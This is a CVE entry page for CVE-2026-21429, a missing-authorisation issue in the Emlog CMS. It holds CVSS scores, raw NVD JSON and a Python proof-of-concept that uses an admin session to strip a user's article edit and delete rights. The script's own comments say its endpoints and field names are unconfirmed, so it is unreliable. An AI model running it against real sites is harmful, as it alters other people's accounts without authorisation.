Security Vulnerability Report
CVE-2026-21429 CVSS 4.3 MEDIUM

CVE-2026-21429

Published: 2026-01-02 18:15:55
Last Modified: 2026-04-29 01:00:02

Description

Emlog is an open source website building system. In version 2.5.23, an admin can set controls that make users unable to edit or delete their articles after publishing them. As of the time of publication, no known patched versions are available.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:emlog:emlog:2.5.23:*:*:*:pro:*:*:* - VULNERABLE
emlog 2.5.23

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
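import requests
import json

# CVE-2026-21429 PoC - Emlog CMS Access Control Bypass
# Target: Emlog CMS 2.5.23
# Vulnerability: Admin can restrict users from editing/deleting their articles
#
# NOTE(review): both functions below drive the CMS with a session that already
# holds the privilege being exercised (an admin session first, then the
# affected user's own session).  The endpoint paths and form field names used
# here are not confirmed anywhere on this page -- check them against the vendor
# advisory before reading a negative result as "not vulnerable".  The page's
# CVSS 4.0 record rates privilegesRequired HIGH (admin), which matches what
# this script needs; its CVSS 3.1 vector says PR:L, and the page does not
# reconcile the two.

TARGET_URL = "http://target-site.com/emlog"
ADMIN_COOKIES = {"EMLOG_ADMIN": "admin_session_cookie"}
TARGET_USER_ID = 2

# Bound every HTTP call so an unresponsive host cannot hang the script forever.
REQUEST_TIMEOUT = 10


def exploit_restrict_user_permissions(
    target_url=TARGET_URL,
    admin_cookies=ADMIN_COOKIES,
    target_user_id=TARGET_USER_ID,
    *,
    timeout=REQUEST_TIMEOUT,
):
    """
    Exploit: Admin restricts user from editing/deleting articles

    Steps:
    1. Authenticate as admin
    2. Access user permission settings
    3. Modify target user's permissions
    4. Verify restriction applied

    Args:
        target_url: Base URL of the Emlog install (defaults to TARGET_URL).
        admin_cookies: Cookie dict carrying an admin session
            (defaults to ADMIN_COOKIES).
        target_user_id: uid of the account whose permissions are changed
            (defaults to TARGET_USER_ID).
        timeout: Per-request timeout in seconds, keyword-only.

    Returns:
        True when the update POST answered with HTTP 200, otherwise False.

    Raises:
        requests.RequestException: on connection failure or timeout.
    """
    session = requests.Session()
    session.cookies.update(admin_cookies)

    # Step 1: Access admin user management panel
    admin_users_url = f"{target_url}/admin/user.php?action=edit&uid={target_user_id}"
    response = session.get(admin_users_url, timeout=timeout)
    if response.status_code != 200:
        print("[-] Failed to access admin panel")
        return False

    # Step 2: Modify user permissions to restrict article editing
    restricted_permissions = {
        "uid": target_user_id,
        "article_edit": 0,  # Disable edit
        "article_delete": 0,  # Disable delete
        "role": "subscriber",  # Lower privilege level
    }
    update_url = f"{target_url}/admin/user.php?action=update"
    response = session.post(update_url, data=restricted_permissions, timeout=timeout)

    # A 200 status alone does not prove the update was applied: a login page
    # or an application error page may also be served with 200.
    if response.status_code == 200:
        print("[+] Successfully restricted user permissions")
        print(f"[+] User {target_user_id} can no longer edit/delete articles")
        return True
    print("[-] Permission modification failed")
    return False


def verify_restriction(
    target_url=TARGET_URL,
    victim_cookies=None,
    article_id=123,
    *,
    timeout=REQUEST_TIMEOUT,
):
    """
    Verify the restriction was applied

    The affected user's own session requests the edit form for one of their
    articles; an HTTP 403 or a body containing "permission denied" is taken
    as confirmation that the restriction is in force.

    Args:
        target_url: Base URL of the Emlog install (defaults to TARGET_URL).
        victim_cookies: Cookie dict for the restricted user's session; None
            selects the placeholder value the original script used.
        article_id: id of an article owned by that user (default 123).
        timeout: Per-request timeout in seconds, keyword-only.

    Returns:
        True when the edit request was denied, otherwise False.

    Raises:
        requests.RequestException: on connection failure or timeout.
    """
    if victim_cookies is None:
        # Placeholder session value; a real run replaces it with the
        # affected user's session cookie.
        victim_cookies = {"EMLOG_USER": "victim_session_cookie"}

    session = requests.Session()
    session.cookies.update(victim_cookies)

    # Victim user attempts to edit their own article
    edit_url = f"{target_url}/admin/article.php?action=edit&id={article_id}"
    response = session.get(edit_url, timeout=timeout)

    denied = response.status_code == 403 or "permission denied" in response.text.lower()
    if denied:
        print("[+] Verification: User is restricted from editing articles")
        return True
    print("[-] Restriction may not have been applied")
    return False


if __name__ == "__main__":
    print("=" * 50)
    print("CVE-2026-21429 PoC - Emlog Access Control Bypass")
    print("=" * 50)
    exploit_restrict_user_permissions()
    verify_restriction()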

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-21429", "sourceIdentifier": "[email protected]", "published": "2026-01-02T18:15:55.110", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Emlog is an open source website building system. In version 2.5.23, the admin can set controls which makes users unable to edit or delete their articles after publishing them. As of time of publication, no known patched versions are available."}, {"lang": "es", "value": "Emlog es un sistema de creación de sitios web de código abierto. En la versión 2.5.23, el administrador puede establecer controles que impiden a los usuarios editar o eliminar sus artículos después de publicarlos. En el momento de la publicación, no se conocen versiones parcheadas disponibles."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.0, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", 
"modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-862"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:emlog:emlog:2.5.23:*:*:*:pro:*:*:*", "matchCriteriaId": "CBBD3D75-C2B3-4727-9B9E-6408956E4ADB"}]}]}], "references": [{"url": "https://github.com/emlog/emlog/security/advisories/GHSA-jw5v-2g53-rx8w", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}